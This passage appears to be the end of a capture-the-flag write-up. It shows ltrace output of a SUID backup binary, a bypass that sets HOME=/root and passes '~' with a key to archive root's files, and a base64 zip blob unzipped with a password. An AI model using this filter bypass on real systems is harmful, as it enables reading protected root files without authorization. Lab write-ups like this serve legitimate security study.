QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6, QWQWQQQk <c jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ
```

- No success: root.txt in this archive is just the troll art
```sh
ltrace backup dsa testing /tmp
strncpy(0xffc10e98, "testing", 100) = 0xffc10e98
strcpy(0xffc10e81, "/") = 0xffc10e81
strcpy(0xffc10e8d, "/") = 0xffc10e8d
strcpy(0xffc10e17, "/e") = 0xffc10e17
strcat("/e", "tc") = "/etc"
strcat("/etc", "/m") = "/etc/m"
strcat("/etc/m", "yp") = "/etc/myp"
strcat("/etc/myp", "la") = "/etc/mypla"
strcat("/etc/mypla", "ce") = "/etc/myplace"
strcat("/etc/myplace", "/k") = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey") = "/etc/myplace/key"
strcat("/etc/myplace/key", "s") = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r") = 0x8307410
```

- There is no filtering for "~"
- "~" is expanded from the HOME variable, so we can point that variable at /root:

```sh
export HOME=/root
backup test 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 "~"
# or
backup -q 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 "~"
```

- Another base64 blob:

```sh
echo "UEsDBAoAAAAAABwWO0sAAAAAAAAAAAAAAAAFABwAcm9vdC9VVAkAA4cDy1njyitidXgLAAEEAAAAAAQAAAAAUEsDBBQACQAIANGDEUd/sK5kgwAAAJQAAAANABwAcm9vdC8ucHJvZmlsZVVUCQADGf7RVePKK2J1eAsAAQQAAAAABAAAAADlUduimngZPcKLGxn6JghwMTV3BpMkPQD35HjGsgbIa0XNjNFgeZx08rPvzlKkPCfqwxuhAFLb2R0p2HwdwbOmtp9mT+BT372NZKAweN1Ui+r6qbcuINf6XcczupaJTmgMcVUxOTRXCB0jNyrdf+06NeBG8qxfXKQ9kl6hMZHHmGbsOlBLBwh/sK5kgwAAAJQAAABQSwMEFAAJAAgAHBY7S9xSZRxNAAAAVQAAABIAHAByb290Ly5iYXNoX2hpc3RvcnlVVAkAA4cDy1njyitidXgLAAEEAAAAAAQAAAAAXZ/Ka4WxwpvFLgEHpj58eLbtxBwfelVogd73JeN5mtNJWYVZ2GOludoCbOhyiaVcOA5A077XAG+hevBT6HjNvntsu3ONZ+hlhY7VSuJQSwcI3FJlHE0AAABVAAAAUEsDBAoAAAAAADR8I0sAAAAAAAAAAAAAAAAMABwAcm9vdC8uY2FjaGUvVVQJAAPDEqxZ48orYnV4CwABBAAAAAAEAAAAAFBLAwQKAAkAAAA0fCNLAAAAAAwAAAAAAAAAIAAcAHJvb3QvLmNhY2hlL21vdGQubGVnYWwtZGlzcGxheWVkVVQJAAPDEqxZ48orYnV4CwABBAAAAAAEAAAAAIjeARvR9gOhwy6QHVBLBwgAAAAADAAAAAAAAABQSwMECgAJAAAA1H0jS/KON0AtAAAAIQAAAA0AHAByb290L3Jvb3QudHh0VVQJAAPQFaxZ48orYnV4CwABBAAAAAAEAAAAAGc5mwIcHawXvZyyOZvYRTKbgvHZNSyJ+tapiDdyaj+l+r0LZ+l9JG2NHtBc4FBLBwjyjjdALQAAACEAAABQSwMEFAAJAAgA65FWR73lED6bBQAAIgwAAAwAHAByb290Ly5iYXNocmNVVAkAA6kZKVbjyitidXgLAAEEAAAAAAQAAAAAgQBoCyZZ0VaXHVzqleDq/WbthUEHIvrZGZsWWARWxiBS0rZUh9RFIiGfsad0ODAkCemr9waEyJdrC2u5SavKYSBYjDFIHVL+7lWL6R92iAux6dM+m7g3zVYuWkWuVKFPuSfxq1babuYmZ4e5Izs+3p4z29VIjrA/3CuZODJXs3lKz59lCk8SxRJIN4vOKwbRsheg1Hgd4/so7OVW0/SumRq8vEmi7qbcuI7uDkcS7U11CEBK3USoUy+IGDZzssXdQGSKhPN2vHU3p/h7/0kA+xV2QdNh1M2z44OHZe6xbHxs8/gzhk3cS2hScJ2S1cCSXkQCcU2slIcd2y17p3NN+JTFlahYPSgF8T409LOY/vxM4EM6cEk6mXBhIkq1bgYTH+kGQUR0BehYAAjdTbpbgVsmtMwLZiPUC9fBgODWiFFd4FPSb+INwUSta/NXj19FbQ8aeo8HAJ7Bi/BREX7sSDnUa30W0hPqrvtvla4hYchOwhW+S14x0lRVa0Wst6n6qNGv/frdJog3peP/pslrJMIBLDD5KHbnNNeX7w11h5dCF41BXo8pX5u2J3AQrD5dIJzswD8uHnuU8WOEZ97spUQrhrm4qOjKJIbT8ZIYL3lad8VGoQLTp1NMAwThIn2vYP+lik5oOM7NhKRB4A5pd2y+5eu3V7peho2KWgaaU3xB7ZsWAOq7b5jXvSMyddukFKRwYrY5uPhz01JEBF1bE2//tQzfBb8tg+AVTTjVcSI/vdgbxy2BdRQXFzfpDwFP1CzeG87BB9GCJgxOQA8UEDLTl2RRzRQw4izN8Y6HGGMBkvEQuqCOdR9GhBNWNPdbmc1E7Wjxfiw1ZTE/Myt7Iz6GLO7/cAMb1x0PXYwosB
HGVQYUZ6dgcaAxorKIOuTRH6yzJY7bFePv/KWF73TiYLhr55v/eoFK6diSRGg9UemDd5PYJpIssgl+LWKgxm9bvHIwHKz5F/c8pNoJtlScAzYtIVOh384GXsn9bWsneL1cGV+P6X63GR5F0K6czLQ656PMww+kUrZLMaWKvLARBI80tDRhvtNoJLwLNyJnu20oIhAAqOQJP1kYZn9WCi6bo4++egMQa5PYhkpyfoVg+DeivEduKwj7JkcnlzFBqzdTmgYpBUfQH2QO55k6IFXkFztoEeaD5nu9vhOdkVDqwnPJpZraTlRooWoOCOvrxrAt3gVHAHPScxG8OApNzmqRCCB1+yS4WcX1aUpVBFFnqHBujheb8RrbFzqzH3xJC1OumleOgCS4/6VPr/dXQz1SOGWnNWh0fFAMRNOdC78xh6/bcadPAMcdxGbaMuLMOByIiQ+hjD/0snD/kWr8KG6rTU8m4ax+m52A2EXjpi9XuQxZuODJbA+GvgWn8WitvxnbpUllkBkR8gmlh0UbI3lyQKg7P3XkrguSV9KjjNWbmiw7aMGuKWtq6TGNp3x0L6z762uFb71OfVQrdduxAa8mIarWERF66rTEDsu9XCOUoBjkleoYyJG6pmwV8L9QRFdlPikb64MXTlMRAtGdBBcMA0LFeB+awwibnVBUjhC/0snuHVrpxgKmRyPEb9Ti6pyACEdJjiVw6PZ9Ocs/lE7RrWHy0Jwo8L8QWK3Mq4h8gbIPmAjLTvRKbfwmtRSKjkmTS8H+BLlMaAl/OsoG8FPv8zdhIoZvwsmCH6pTAKb7jtiBKp6oUxtzx2LITpeamMFjo44lDwVm6UW9ycjFSZLXbzqdKXK7U3C19gggRCflOIGSKEvr2Ym4yokhUkcYwmhfBfm+uVzFx1QBipHXNrLb/DKBz57CzLYst+6jyErCPOSCBZqIl6xgtxyfj+iDIaPUMxCxdKrEPb7glhCmRt8zDhnXGNLPgF3p5yOvBw4strt4xTfMIurwi15ek2PJITq4dAvomQweAhKYg1BLBwi95RA+mwUAACIMAABQSwMEFAAJAAgAwgE7S/yjvbihAQAAeQMAAA0AHAByb290Ly52aW1pbmZvVVQJAAM738pZ48orYnV4CwABBAAAAAAEAAAAACqPrZClx8DRlW/zRg0U7737vcnIyW5F0Lib2qnZDTrY3qKVTeeFimhphMPtbBjlGY7WNoCCjl5nk+5ayK921aGUpPTrMAw4QYR381aRlO50uTzL2QbFSbYCilJGl8T9C8sMkZbvMp7zMtTlMYnyv9v06OV1ZB7Rj+jYLATaq9p20HpOLmWuHbxYSmt40TEtoPzSrPiWu9RBaa+cZKjJkliKTiC+T9ZPpu3gChMXB/ExXBpiGbj6k4JG0CnrFAaO4euwg308FKn4hZsOmg1DCAnPaXprTqlSl2a7rTei64hMzHRF/fIhH8MJElph90nbIIQVVJ6bZeQBsMuwSbHDXquAaSCjfcQgpiEBR12A9MpXt5ukp4odvYEa47QWkaPYvsayZya3NW5Pzzur40BmNc0f1Nfwt7TzWDDaAos2oWbq9Q+udDZhqKBvRnO0HE/pW6hRykOM1rhibnX5nw0SFizYjPXoKPDfRzxj1Pnu2mU275snqWigTr+8IylqoHDR/1hBNvDJgbreXkqXjZ7blJ8lasxR7ggyDMBemapzY+pD+1BLBwj8o724oQEAAHkDAABQSwMECgAAAAAAmIAjSwAAAAAAAAAAAAAAAAsAHAByb290Ly5uYW5vL1VUCQADEBqsWePKK2J1eAsAAQQAAAAABAAAAABQSwMECgAJAAAAxko7S9ntHzwTAAAABwAAABkAHAByb290Ly5uYW5vL3NlYXJjaF9oaXN0b3J5VVQJAAOzX8tZ48orYnV4CwABBAAAAAAEAAAAAMzuq3hl3MzEDZBFxFzAnqKaxWtQSwcI2e0fPBMAAAAHAAAAUEsBAh4DCgAAAAAAHB
Y7SwAAAAAAAAAAAAAAAAUAGAAAAAAAAAAQAMBBAAAAAHJvb3QvVVQFAAOHA8tZdXgLAAEEAAAAAAQAAAAAUEsBAh4DFAAJAAgA0YMRR3+wrmSDAAAAlAAAAA0AGAAAAAAAAQAAAKSBPwAAAHJvb3QvLnByb2ZpbGVVVAUAAxn+0VV1eAsAAQQAAAAABAAAAABQSwECHgMUAAkACAAcFjtL3FJlHE0AAABVAAAAEgAYAAAAAAABAAAAgIEZAQAAcm9vdC8uYmFzaF9oaXN0b3J5VVQFAAOHA8tZdXgLAAEEAAAAAAQAAAAAUEsBAh4DCgAAAAAANHwjSwAAAAAAAAAAAAAAAAwAGAAAAAAAAAAQAMBBwgEAAHJvb3QvLmNhY2hlL1VUBQADwxKsWXV4CwABBAAAAAAEAAAAAFBLAQIeAwoACQAAADR8I0sAAAAADAAAAAAAAAAgABgAAAAAAAAAAACkgQgCAAByb290Ly5jYWNoZS9tb3RkLmxlZ2FsLWRpc3BsYXllZFVUBQADwxKsWXV4CwABBAAAAAAEAAAAAFBLAQIeAwoACQAAANR9I0vyjjdALQAAACEAAAANABgAAAAAAAEAAACggX4CAAByb290L3Jvb3QudHh0VVQFAAPQFaxZdXgLAAEEAAAAAAQAAAAAUEsBAh4DFAAJAAgA65FWR73lED6bBQAAIgwAAAwAGAAAAAAAAQAAAKSBAgMAAHJvb3QvLmJhc2hyY1VUBQADqRkpVnV4CwABBAAAAAAEAAAAAFBLAQIeAxQACQAIAMIBO0v8o724oQEAAHkDAAANABgAAAAAAAAAAACAgfMIAAByb290Ly52aW1pbmZvVVQFAAM738pZdXgLAAEEAAAAAAQAAAAAUEsBAh4DCgAAAAAAmIAjSwAAAAAAAAAAAAAAAAsAGAAAAAAAAAAQAO1B6woAAHJvb3QvLm5hbm8vVVQFAAMQGqxZdXgLAAEEAAAAAAQAAAAAUEsBAh4DCgAJAAAAxko7S9ntHzwTAAAABwAAABkAGAAAAAAAAQAAAICBMAsAAHJvb3QvLm5hbm8vc2VhcmNoX2hpc3RvcnlVVAUAA7Nfy1l1eAsAAQQAAAAABAAAAABQSwUGAAAAAAoACgBWAwAApgsAAAAA" | base64 -d > root.zip
unzip root.zip
password: magicword
```
## Skills Learned
- Bypassing user agent filtering
- Brute forcing JSON payloads
- Exploiting buffer overflows
- Bypassing ASLR and NX